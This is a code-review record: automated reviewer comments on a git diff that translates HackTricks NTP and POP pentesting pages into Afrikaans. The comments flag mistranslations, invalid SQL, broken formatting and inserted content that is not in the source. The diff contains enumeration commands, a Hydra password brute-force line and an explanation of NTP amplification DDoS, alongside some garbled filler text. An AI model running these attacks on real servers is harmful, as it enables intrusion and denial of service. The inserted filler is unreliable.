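Review bot: the `### MySQL Toestemmingsopsporing` block added in the `@@ -107,9 +106,61 @@` hunk is new Dutch-language content with no counterpart in the English `### MySQL Permissions Enumeration` section, and its SQL examples are not valid MySQL: `SHOW GRANTS FOR 'gebruikersnaam'@'localhost' LIKE '%opdracht%';` (`SHOW GRANTS` takes no `LIKE` clause) and `SHOW TABLES FROM 'databasenaam';` (database and table identifiers must be bare or backtick-quoted, not single-quoted strings; the same applies to `SHOW COLUMNS FROM 'databasenaam'.'tabelnaam';`). Revert the insertion so the translated heading is followed by the original `#Mysql` / `SHOW GRANTS [FOR user];` code block. In the adjacent `@@ -121,7 +172,7 @@` hunk the only change to `select * from mysql.user where user='root';` is whitespace; drop it to keep the diff clean.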
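Review bot: in the `@@ -132,70 +183,62 @@` hunk the SQL keyword `local` was translated in the explanatory lines `(Notisie die "plaaslike" woord)\` and `Want sonder die "plaaslike" kan jy kry:`, but the statement they refer to is still `load data local infile ...`, so the reader can no longer match the prose to the keyword that makes the difference. Keep `local` verbatim (for example `Let op die woord "local"`), since it is syntax rather than translatable text; `Notisie` is also not an Afrikaans word, `Let op` is the usual rendering of "Notice".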
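Review bot: the `@@ -250,9 +289,43 @@` hunk inserts four generic subsections (`##### MySQL Service Enumeration` through `##### MySQL Service Hardening`) directly under `#### Windows`, between that heading and the Windows UDF SQL block that starts with `USE mysql;`. None of that text is in the English page, it has nothing to do with the Windows-specific UDF steps, and it separates the heading from its code so the section now reads as a hardening checklist. Remove the added lines and keep the heading immediately above the `sql` fence as in the original.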
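Review bot: the `### Nuttige lêers` list in the `@@ -264,56 +337,51 @@` hunk lost its nesting: the original indented `config.ini`, `my.ini` and the other Windows paths under `* windows \*`, the `my.cnf` paths under `* unix`, `~/.mysql.history` under `Command History` and the `*.log` entries under `Log Files`, whereas the translated version makes every item a top-level bullet (`* windows \*` / `* config.ini` / `* my.ini`), so the platform groupings are gone. Restore the two-space indentation on the child items. The heading `### Uittreksel van MySQL-gelde van lêers` also mistranslates "credentials": `gelde` means money; use `geloofsbriewe`, which this same hunk already uses in `Jy kan **hierdie geloofsbriewe gebruik ...`.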
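Review bot: the `@@ -545,18 +613,7 @@` hunk deletes twelve entries from the `sys` schema view list (`memory\_by\_thread\_by\_current\_bytes\` through `schema\_table\_lock\_waits\`) and replaces them with the truncated fragment `memory\_by\_thread\_by\_current`, which is not a real view name and also drops the trailing `\` line-break marker. This is a list of identifiers, not translatable text; restore the removed lines unchanged.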
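Review bot: two structural breaks in the `@@ -630,60 +687,54 @@` hunk. First, the closing `{% endtab %}` and `{% endtabs %}` lines after `x$waits\_global\_by\_latency` are deleted, leaving the `{% tabs %}` / `{% tab title="information_schema" %}` block opened earlier unclosed, which will break the GitBook render of the whole page. Second, inside the `HackTricks Outomatiese Opdragte` block every field under `Entry_1:` through `Entry_4:` is de-indented (`Name: Notes`, `Description: Notes for MySql`, `Note: |`), so the keys are no longer children of their entry and the `|` block scalar under `Note:` loses its indented body. Restore the two closing tags and the original indentation; nothing inside that block needed translating.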
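Review bot: the trailing support-links hunk is inconsistent with the identical list at the top of this file: it uses `github-opslagplekke` and `haktruuks` where the header hunk uses `github-repos` and `hacktruuks`, and the pentesting-ntp.md header uses a third spelling, `hack-truuks`. Since this header/footer is shared boilerplate across every translated page, pick one wording and apply it to all occurrences.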
diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md index f1436113f..4d448a84a 100644 --- a/network-services-pentesting/pentesting-ntp.md +++ b/network-services-pentesting/pentesting-ntp.md @@ -2,54 +2,79 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Gaan in gesprek met inhoud wat die opwinding en uitdagings van hackery ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige hack-wêreld deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagbountes wat bekendgestel word en kritieke platformopdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic Information +## Basiese Inligting -The **Network Time Protocol (NTP)** ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. NTP's accuracy is essential, but it also poses security risks if not properly managed. +Die **Network Time Protocol (NTP)** verseker dat rekenaars en netwerktoestelle oor veranderlike-latensie-netwerke hul horlosies akkuraat sinkroniseer. Dit is noodsaaklik vir die handhawing van presiese tydwaarneming in IT-bedrywighede, sekuriteit en logboekhouding. NTP se akkuraatheid is essensieel, maar dit stel ook sekuriteitsrisiko's in as dit nie behoorlik bestuur word nie. 
-### Summary & Security Tips: -- **Purpose**: Syncs device clocks over networks. -- **Importance**: Critical for security, logging, and operations. -- **Security Measures**: - - Use trusted NTP sources with authentication. - - Limit NTP server network access. - - Monitor synchronization for signs of tampering. - -**Default port:** 123/udp +### Opsomming & Sekuriteitswenke: +- **Doel**: Sinkroniseer toestelhorlosies oor netwerke. +- **Belangrikheid**: Krities vir sekuriteit, logboekhouding en bedrywighede. +- **Sekuriteitsmaatreëls**: +- Gebruik betroubare NTP-bronne met verifikasie. +- Beperk NTP-bedienernetwerktoegang. +- Monitor sinkronisasie vir tekens van manipulasie. +**Verstekpoort:** 123/udp ``` PORT STATE SERVICE REASON 123/udp open ntp udp-response ``` +## Opname -## Enumeration +### NTP (Network Time Protocol) +NTP (Network Time Protocol) is 'n protokol wat gebruik word om die korrekte tyd op 'n netwerk te sinkroniseer. Dit is 'n kritieke diens wat deur baie toepassings en stelsels gebruik word. Tydens 'n pentest kan die opname van NTP help om potensiële kwesbaarhede en aanvalsvektore te identifiseer. + +#### UDP-poort 123 + +NTP gebruik UDP-poort 123 vir kommunikasie. Dit is belangrik om te weet dat NTP 'n stateless protokol is, wat beteken dat elke versoek en antwoord as 'n afsonderlike transaksie hanteer word. + +#### NTP-klieënte + +Die eerste stap in die opname van NTP is om die NTP-klieënte op die teikenstelsel te identifiseer. Dit kan gedoen word deur die UDP-poort 123 te skandeer en te kyk vir aktiewe kliënte wat met die NTP-diens kommunikeer. + +#### NTP-bedieners + +Die volgende stap is om die NTP-bedieners op die teikenstelsel te identifiseer. Dit kan gedoen word deur die UDP-poort 123 te skandeer en te kyk vir aktiewe bedieners wat NTP-verkeer ontvang. + +#### NTP-bedieners se konfigurasie + +Die konfigurasie van die NTP-bedieners kan ook nuttige inligting verskaf. Dit kan gedoen word deur die bedieners se konfigurasiebestande te ondersoek. 
Hierdie bestande bevat dikwels inligting oor die bedieners se vertroude bron van tyd, toegestane kliënte en ander relevante instellings. + +#### NTP-verkeer analiseer + +Die analise van NTP-verkeer kan ook waardevolle inligting verskaf. Dit kan gedoen word deur die NTP-verkeer te onderskep en te ontleed. Hierdie analise kan help om potensiële kwesbaarhede, aanvalsvektore en selfs tydmanipulasie te identifiseer. + +#### NTP-aanvalle + +Laastens kan die opname van NTP ook help om potensiële aanvalsvektore te identifiseer. Daar is verskeie aanvalstegnieke wat gebruik kan word teen NTP, soos NTP-versterkingsaanvalle en NTP-man-in-die-middel-aanvalle. Die identifisering van hierdie aanvalsvektore kan help om die teikenstelsel te versterk en te beskerm teen moontlike aanvalle. ```bash ntpq -c readlist ntpq -c readvar 
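Review bot: The block from `+### NTP (Network Time Protocol)` through `+#### NTP-aanvalle` (generic paragraphs about scanning UDP 123 for clients and servers, reading configuration files, analysing traffic) has no counterpart in the removed lines; the only thing removed there is `-## Enumeration`. A translation PR should not add content, so drop those paragraphs and keep just the translated heading directly above the `ntpq -c readlist` block, preferably `## Enumerasie` rather than `## Opname`, since the PostgreSQL file in this same patch translates "Enumeration" as "Enumerasie". Two formatting regressions in the same hunk: the sub-bullets under `**Sekuriteitsmaatreëls**:` lost their leading two spaces (`-  - Use trusted NTP sources with authentication.` became `+- Gebruik betroubare NTP-bronne met verifikasie.`), so they now render as top-level items, and the blank lines before `**Verstekpoort:** 123/udp` and before the fenced port listing were removed, leaving `+## Opname` glued to the closing fence.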
@@ -63,76 +88,68 @@ ntpdc -c sysinfo ```bash nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 ``` - -## Examine configuration files +## Ondersoek konfigurasie lêers * ntp.conf -## NTP Amplification Attack +## NTP Amplifikasie Aanval -[**How NTP DDoS Attack Works**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref) - -The **NTP protocol**, using UDP, allows for operation without the need for handshake procedures, unlike TCP. This characteristic is exploited in **NTP DDoS amplification attacks**. Here, attackers create packets with a fake source IP, making it seem as if the attack requests come from the victim. These packets, initially small, prompt the NTP server to respond with much larger data volumes, amplifying the attack. - -The **_MONLIST_** command, despite its rare use, can report the last 600 clients connected to the NTP service. While the command itself is simple, its misuse in such attacks highlights critical security vulnerabilities. +[**Hoe NTP DDoS Aanval Werk**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref) +Die **NTP-protokol**, wat UDP gebruik, maak dit moontlik om te werk sonder die nodigheid van handskudprosedures, in teenstelling met TCP. Hierdie eienskap word uitgebuit in **NTP DDoS amplifikasie aanvalle**. Aanvallers skep pakkies met 'n vals bron-IP-adres, wat dit laat voorkom asof die aanvrae van die slagoffer afkomstig is. Hierdie pakkies, aanvanklik klein, lei die NTP-bediener om te reageer met veel groter data-volumes, wat die aanval versterk. +Die **_MONLIST_**-opdrag, ten spyte van sy seldsame gebruik, kan die laaste 600 kliënte wat aan die NTP-diens gekoppel is, rapporteer. Terwyl die opdrag self eenvoudig is, beklemtoon die misbruik daarvan in sulke aanvalle kritieke sekuriteitskwesbaarhede. 
```bash ntpdc -n -c monlist ``` - ## Shodan * `ntp` -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: NTP #Protocol Abbreviation if there is one. Port_Number: 123 #Comma separated if there is more than one. Protocol_Description: Network Time Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for NTP - Note: | - The Network Time Protocol (NTP) ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. NTP's accuracy is essential, but it also poses security risks if not properly managed. +Name: Notes +Description: Notes for NTP +Note: | +The Network Time Protocol (NTP) ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. NTP's accuracy is essential, but it also poses security risks if not properly managed. - https://book.hacktricks.xyz/pentesting/pentesting-ntp +https://book.hacktricks.xyz/pentesting/pentesting-ntp Entry_2: - Name: Nmap - Description: Enumerate NTP - Command: nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 {IP} +Name: Nmap +Description: Enumerate NTP +Command: nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 {IP} ``` - -​ -
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
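Review bot: The `HackTricks Outomatiese Opdragte` block loses its indentation under `Entry_1:` and `Entry_2:` (`-    Name: Notes` became `+Name: Notes`, `-    Note: |` became `+Note: |`, `-    Command: nmap ...` became `+Command: nmap ...`), which breaks the YAML-style nesting that block is written in; restore the four-space indentation and leave the English content as it is, which the hunk already does. Also the blank lines around `## Shodan` and before the fence were removed. Minor consistency point: "bug bounty hunters" is rendered as "foutjagters" in the opening banner and "foutbeloningsjagters" in the closing one, and "Real-Time Hack News" as "Hack-nuus in werklikheid" at the top and "Real-Time Hack Nuus" at the bottom; pick one form for each.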
diff --git a/network-services-pentesting/pentesting-pop.md b/network-services-pentesting/pentesting-pop.md index 0df834a30..28f672794 100644 --- a/network-services-pentesting/pentesting-pop.md +++ b/network-services-pentesting/pentesting-pop.md @@ -2,173 +2,223 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## Basic Information +## Basiese Inligting -**Post Office Protocol (POP)** is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and **retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of **POP clients** typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, **POP3** stands out as the most prevalently employed version. +**Post Office Protocol (POP)** word beskryf as 'n protokol binne die domein van rekenaarnetwerke en die internet, wat gebruik word vir die onttrekking en **herwinning van e-pos van 'n afgeleë posdiensbediener**, sodat dit toeganklik is op die plaaslike toestel. Geplaas binne die toepassingslaag van die OSI-model, maak hierdie protokol dit moontlik vir gebruikers om e-pos op te haal en te ontvang. 
Die werking van **POP-kliënte** behels tipies die vestiging van 'n verbinding met die posdiensbediener, aflaai van alle boodskappe, stoor van hierdie boodskappe lokaal op die kliëntstelsel, en dit daarna van die bediener verwyder. Alhoewel daar drie iterasies van hierdie protokol is, steek **POP3** uit as die mees algemeen gebruikte weergawe. -**Default ports:** 110, 995(ssl) - +**Verstekpoorte:** 110, 995(ssl) ``` PORT STATE SERVICE 110/tcp open pop3 ``` +### Banner Gaping -## Enumeration +Banner Gaping is 'n tegniek wat gebruik word om inligting oor 'n POP-diens te verkry deur die banner te ondersoek wat deur die diens teruggestuur word. Dit kan gedoen word deur 'n eenvoudige TCP-verbinding na die POP-diens te maak en die banner te lees wat deur die diens teruggestuur word. Die banner bevat dikwels nuttige inligting soos die diens se weergawe en die gebruikte sagteware. -### Banner Grabbing +Om banner gaping uit te voer, kan jy 'n hulpmiddel soos `telnet` gebruik om 'n TCP-verbinding na die POP-diens te maak en die banner te lees wat deur die diens teruggestuur word. Byvoorbeeld: +```plaintext +telnet 110 +``` + +Nadat jy die verbinding gemaak het, sal jy die banner sien wat deur die POP-diens teruggestuur word. Hierdie banner kan nuttige inligting verskaf wat jy kan gebruik om verdere aanvalle uit te voer of om die POP-diens te identifiseer. ```bash nc -nv 110 openssl s_client -connect :995 -crlf -quiet ``` +## Handleiding -## Manual - -You can use the command `CAPA` to obtain the capabilities of the POP3 server. - -## Automated +Jy kan die opdrag `CAPA` gebruik om die vermoëns van die POP3-bediener te verkry. +## Geoutomatiseerd ```bash nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port #All are default scripts ``` - -The `pop3-ntlm-info` plugin will return some "**sensitive**" data (Windows versions). +Die `pop3-ntlm-info` invoegtoepassing sal sekere "**sensitiewe**" data (Windows-weergawes) teruggee. 
### [POP3 bruteforce](../generic-methodologies-and-resources/brute-force.md#pop) -## POP syntax - -POP commands examples from [here](http://sunnyoasis.com/services/emailviatelnet.html) +## POP sintaksis +POP-opdragvoorbeelde van [hier](http://sunnyoasis.com/services/emailviatelnet.html) ```bash POP commands: - USER uid Log in as "uid" - PASS password Substitue "password" for your actual password - STAT List number of messages, total mailbox size - LIST List messages and sizes - RETR n Show message n - DELE n Mark message n for deletion - RSET Undo any changes - QUIT Logout (expunges messages if no RSET) - TOP msg n Show first n lines of message number msg - CAPA Get capabilities +USER uid Log in as "uid" +PASS password Substitue "password" for your actual password +STAT List number of messages, total mailbox size +LIST List messages and sizes +RETR n Show message n +DELE n Mark message n for deletion +RSET Undo any changes +QUIT Logout (expunges messages if no RSET) +TOP msg n Show first n lines of message number msg +CAPA Get capabilities +``` +### POP (Post Office Protocol) + +POP (Post Office Protocol) is a protocol used by email clients to retrieve email messages from a mail server. It is one of the most common protocols used for email retrieval. + +#### POP3 + +POP3 (Post Office Protocol version 3) is the most widely used version of POP. It operates on port 110 and uses a simple text-based protocol. + +##### Enumeration + +To enumerate users on a POP3 server, you can use the `USER` command followed by a username. If the server responds with an error message, it means that the user does not exist. If the server responds with a positive message, it means that the user exists. + +``` +USER ``` -Example: +##### Brute-Force Attack +To perform a brute-force attack on a POP3 server, you can use a tool like Hydra. Hydra is a powerful tool that can perform dictionary and brute-force attacks against various protocols, including POP3. 
+ +``` +hydra -L -P -s -f pop3 +``` + +##### Password Spraying + +Password spraying is a technique used to bypass account lockouts by attempting a small number of commonly used passwords against multiple user accounts. This technique can be effective against POP3 servers that do not have account lockout policies in place. + +##### Exploiting Vulnerabilities + +There are several vulnerabilities that can be exploited in POP3 servers, such as buffer overflows, command injection, and format string vulnerabilities. Exploiting these vulnerabilities can allow an attacker to gain unauthorized access to the server or execute arbitrary code. + +#### POP3S + +POP3S (Secure POP3) is a secure version of POP3 that uses SSL/TLS encryption to secure the communication between the email client and the mail server. It operates on port 995. + +##### Enumeration + +The enumeration techniques for POP3S are the same as for POP3. However, since POP3S uses SSL/TLS encryption, you will need to use a tool like `openssl` to establish a secure connection to the server. + +``` +openssl s_client -connect : +``` + +##### Brute-Force Attack + +The brute-force attack techniques for POP3S are the same as for POP3. However, since POP3S uses SSL/TLS encryption, you will need to use a tool like `openssl` to establish a secure connection to the server. + +##### Password Spraying + +The password spraying techniques for POP3S are the same as for POP3. However, since POP3S uses SSL/TLS encryption, you will need to use a tool like `openssl` to establish a secure connection to the server. + +##### Exploiting Vulnerabilities + +The vulnerability exploitation techniques for POP3S are the same as for POP3. However, since POP3S uses SSL/TLS encryption, you will need to use a tool like `openssl` to establish a secure connection to the server. 
``` root@kali:~# telnet $ip 110 - +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready - USER billydean - +OK - PASS password - +OK Welcome billydean ++OK beta POP3 server (JAMES POP3 Server 2.3.2) ready +USER billydean ++OK +PASS password ++OK Welcome billydean - list +list - +OK 2 1807 - 1 786 - 2 1021 ++OK 2 1807 +1 786 +2 1021 - retr 1 +retr 1 - +OK Message follows - From: jamesbrown@motown.com - Dear Billy Dean, ++OK Message follows +From: jamesbrown@motown.com +Dear Billy Dean, - Here is your login for remote desktop ... try not to forget it this time! - username: billydean - password: PA$$W0RD!Z +Here is your login for remote desktop ... try not to forget it this time! +username: billydean +password: PA$$W0RD!Z ``` +## Gevaarlike Instellings -## Dangerous Settings +Vanaf [https://academy.hackthebox.com/module/112/section/1073](https://academy.hackthebox.com/module/112/section/1073) -From [https://academy.hackthebox.com/module/112/section/1073](https://academy.hackthebox.com/module/112/section/1073) - -| **Setting** | **Description** | -| ------------------------- | ----------------------------------------------------------------------------------------- | -| `auth_debug` | Enables all authentication debug logging. | -| `auth_debug_passwords` | This setting adjusts log verbosity, the submitted passwords, and the scheme gets logged. | -| `auth_verbose` | Logs unsuccessful authentication attempts and their reasons. | -| `auth_verbose_passwords` | Passwords used for authentication are logged and can also be truncated. | -| `auth_anonymous_username` | This specifies the username to be used when logging in with the ANONYMOUS SASL mechanism. | - -## HackTricks Automatic Commands +| **Instelling** | **Beskrywing** | +| ------------------------- | ----------------------------------------------------------------------------------------------- | +| `auth_debug` | Stel alle verifikasie foutopsporingslogging in. 
| +| `auth_debug_passwords` | Hierdie instelling pas log-verdowwing toe, die ingedien wagwoorde en die skema word gelog. | +| `auth_verbose` | Log onsuksesvolle verifikasiepogings en hul redes. | +| `auth_verbose_passwords` | Wagwoorde wat vir verifikasie gebruik word, word gelog en kan ook afgekort word. | +| `auth_anonymous_username` | Dit spesifiseer die gebruikersnaam wat gebruik moet word wanneer daar met die ANONYMOUS SASL-meganisme ingeteken word. | +## HackTricks Outomatiese Opdragte ``` Protocol_Name: POP #Protocol Abbreviation if there is one. Port_Number: 110 #Comma separated if there is more than one. Protocol_Description: Post Office Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for POP - Note: | - Post Office Protocol (POP) is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of POP clients typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, POP3 stands out as the most prevalently employed version. +Name: Notes +Description: Notes for POP +Note: | +Post Office Protocol (POP) is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. 
The operation of POP clients typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, POP3 stands out as the most prevalently employed version. - https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop +https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop Entry_2: - Name: Banner Grab - Description: Banner Grab 110 - Command: nc -nv {IP} 110 +Name: Banner Grab +Description: Banner Grab 110 +Command: nc -nv {IP} 110 Entry_3: - Name: Banner Grab 995 - Description: Grab Banner Secure - Command: openssl s_client -connect {IP}:995 -crlf -quiet +Name: Banner Grab 995 +Description: Grab Banner Secure +Command: openssl s_client -connect {IP}:995 -crlf -quiet Entry_4: - Name: Nmap - Description: Scan for POP info - Command: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP} +Name: Nmap +Description: Scan for POP info +Command: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP} Entry_5: - Name: Hydra Brute Force - Description: Need User - Command: hydra -l {Username} -P {Big_Passwordlist} -f {IP} pop3 -V - -Entry_6: - Name: consolesless mfs enumeration - Description: POP3 enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/pop3/pop3_version; set RHOSTS {IP}; set RPORT 110; run; exit' - -``` +Name: Hydra Brute Force +Description: Need User +Command: hydra -l {Username} -P {Big_Passwordlist} -f {IP} pop3 -V +Entry_6: +Name: consolesless mfs enumeration +Description: POP3 enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/pop3/pop3_version; set RHOSTS {IP}; set RPORT 110; run; exit' + +```
